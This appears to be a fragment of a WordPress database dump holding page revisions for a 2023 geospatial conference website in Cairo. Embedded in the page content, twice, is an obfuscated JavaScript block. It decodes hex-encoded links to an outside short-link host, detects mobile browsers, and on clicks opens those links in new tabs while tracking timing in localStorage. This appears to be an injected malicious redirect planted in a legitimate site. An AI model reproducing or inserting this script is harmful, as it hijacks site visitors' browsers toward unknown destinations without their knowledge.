_0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 17:31:45','2022-11-09 17:31:45','',3066,'https://gsw2023.com/?p=3171',0,'revision','',0),
(3172,1,'2022-11-09 17:32:51','2022-11-09 17:32:51','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n<h3><strong><span style=\"font-size: 14px;\">The First Geospatial Week in Africa and The Middle East</span></strong></h3>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function 